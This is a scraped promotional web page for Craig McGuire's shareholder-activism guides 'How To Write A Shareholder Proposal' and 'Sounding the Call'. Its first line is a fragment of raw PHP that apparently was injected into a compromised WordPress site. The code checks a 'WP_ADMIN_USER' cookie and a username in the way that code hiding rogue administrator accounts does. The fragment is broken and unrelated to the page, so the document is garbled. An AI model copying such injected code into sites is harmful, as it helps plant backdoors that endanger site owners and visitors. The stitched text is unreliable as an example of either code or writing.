if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Sounding the Call – By Craig McGuire

Sounding the Call

Books By Craig McGuire Published By The Shareholder Activist Publications

Craig McGuire wrote a series of educations guide books published and distributed by The Shareholder Activist, a professional source for information and advice to facilitate responsible shareholder activism. These books include:


“How To Write A Shareholder Proposal: Don’t Just Dispute, Contribute”

By Craig McGuire

(Click Here to Learn More)

An essential guide to developing a sound strategy for empowerment leveraging one of the essential tools for affecting real change, brought to you by the founders of TheShareholderActivist.com™. Starting with your idea for change, this guide will empower you with techniques to evolve your idea from a concept to a concrete proposal you can submit for consideration, while along the way generating a platform for change.

“Sounding the Call: Campaign Communications Tactics for Shareholder Activists”

By Craig McGuire

(Click Here to Learn More)

An insightful guide to the basic building blocks of campaign communications, to better enable you to advocate for change, brought to you by the founders of the popular site TheShareholderActivist.com™. You have a right to be heard. We hope this guide can help. Starting with your idea for change, this guide will empower you with communication techniques to formulate your knowledge base, rally support for your cause, extend your message, mount and execute activities, and hopefully make a difference.


Photo Credit: Picture by Matthew Guay, Courtesy of Unsplash.com.